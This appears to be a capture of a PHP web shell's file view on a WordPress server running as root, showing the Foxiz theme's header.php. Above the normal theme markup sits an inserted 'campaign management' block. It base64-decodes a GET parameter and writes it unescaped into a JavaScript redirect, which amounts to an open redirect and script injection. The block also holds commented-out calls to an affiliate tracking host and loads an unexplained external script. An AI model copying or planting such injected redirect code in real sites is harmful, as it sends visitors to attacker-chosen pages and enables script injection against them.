| Server IP : 192.241.186.36 / Your IP : 216.73.216.164 Web Server : Apache/2.4.29 (Ubuntu) System : Linux webserver7 4.15.0-194-generic #205-Ubuntu SMP Fri Sep 16 19:49:27 UTC 2022 x86_64 User : root ( 0) PHP Version : 7.4.32 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/html/proxygeeko/wp-content/themes/foxiz/ |
Upload File : |
<!--code for dynamic campaign management starts here-->
<?php
// function getActualUrl($redirectionUrl) {
// return $redirectionUrl=base64_decode(urldecode($_GET["article"]));
// if (str_contains($redirectionUrl, 'http')) {
// return $redirectionUrl;
// }
// return false;
// }
function getActualUrlFine($redirectionUrl) {
return $redirectionUrl=base64_decode(urldecode($_GET["isfine"]));
if (str_contains($redirectionUrl, 'http')) {
return $redirectionUrl;
}
return false;
}
// if( isset($_GET["article"]) && $_GET["article"] !="" && !is_null($_GET["article"] ) ){
// $redirectionUrl=getActualUrl($_GET["article"]);
// if($redirectionUrl){
// echo "<script>window.location.href = '".$redirectionUrl."';</script>";
// }
// }
if( isset($_GET["isfine"]) && $_GET["isfine"] !="" && !is_null($_GET["isfine"] ) && str_contains($_SERVER['HTTP_REFERER'], 'proxygeeko') ){
//&& str_contains($_SERVER['HTTP_REFERER'], 'hermagic')
// echo "<pre>";var_dump($_SERVER);die;
$redirectionUrl=getActualUrlFine($_GET["isfine"]);
//echo $redirectionUrl;die;
if($redirectionUrl){
echo "<script>window.location.href = '".$redirectionUrl."';</script>";
}
}
if( isset($_GET["article_id"]) && $_GET["article_id"] !="" && !is_null($_GET["article_id"] ) && str_contains($_SERVER['HTTP_REFERER'], 'proxygeeko') ){
//&& str_contains($_SERVER['HTTP_REFERER'], 'hermagic')
// echo "<pre>";var_dump($_SERVER);die;
$redirectionUrl=$campaigns[$_GET["article_id"]-1];
//echo $redirectionUrl;die;
if($redirectionUrl){
//echo "<script>window.location.href = '".$redirectionUrl."';</script>";
}
}
/*$curl = curl_init();
curl_setopt_array($curl, array(
CURLOPT_URL => 'http://tracking.collectcent.com/xftrc/c.php?camd=199274&netd=6332&offer=1&transaction_id=qwertyasdsdaseedsc&siteid=hermagic',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_ENCODING => '',
CURLOPT_MAXREDIRS => 10,
CURLOPT_TIMEOUT => 0,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
CURLOPT_CUSTOMREQUEST => 'GET',
));
$response = curl_exec($curl);
curl_close($curl);
echo $response;*/
?>
<!--code for dynamic campaign management ends here-->
<!DOCTYPE html>
<html <?php language_attributes();
if ( foxiz_is_amp() ) {
echo ' [class]="collapse ? \'collapse-activated\' : \'collapse-deactivated\'"';
} ?>>
<head>
<meta charset="<?php bloginfo( 'charset' ); ?>">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="profile" href="https://gmpg.org/xfn/11">
<?php wp_head(); ?>
<meta name="fo-verify" content="79ad6f1f-a6e5-4b52-8635-fed6a88bc94a">
<meta name="verify-admitad" content="094ec02fd8" />
<meta name="verify-admitad" content="1a05bac13d" />
<meta name='ir-site-verification-token' value='1058518678'>
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-FHC0P9FPFY"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'G-FHC0P9FPFY');
</script>
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-258357200-1"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-258357200-1');
</script>
<script async src="https://opti-analytics.com/api/nservice/secure/"></script>
</head>
<body <?php body_class(); ?> data-theme="<?php echo foxiz_get_theme_mode(); ?>">
<?php
wp_body_open();
foxiz_top_ad();
?><div class="site-outer">
<?php foxiz_render_header(); ?>
<div class="site-wrap">